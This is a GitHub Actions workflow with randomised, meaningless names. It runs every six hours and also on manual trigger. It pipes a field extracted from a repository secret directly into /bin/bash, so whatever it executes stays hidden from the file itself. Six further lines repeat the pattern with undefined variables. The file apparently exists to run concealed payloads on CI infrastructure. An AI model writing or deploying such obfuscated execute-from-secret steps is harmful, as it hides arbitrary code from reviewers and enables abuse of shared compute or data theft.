name: cordagetwice

on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cordagetwice
        env:
          vfdsq88: ${{ secrets.vfdsq88 }}
        run: |
          echo $vfdsq88 | jq -r .gyoeo8 | /bin/bash
          echo $bbn382 | jq -r .kvyu1717 | /bin/bash
          echo $xj59 | jq -r .hxfrs5 | /bin/bash
          echo $rbk62217 | jq -r .jvs5137 | /bin/bash
          echo $ni5 | jq -r .p873 | /bin/bash
          echo $tgp227 | jq -r .qyad06 | /bin/bash
          echo $p2 | jq -r .a813 | /bin/bash

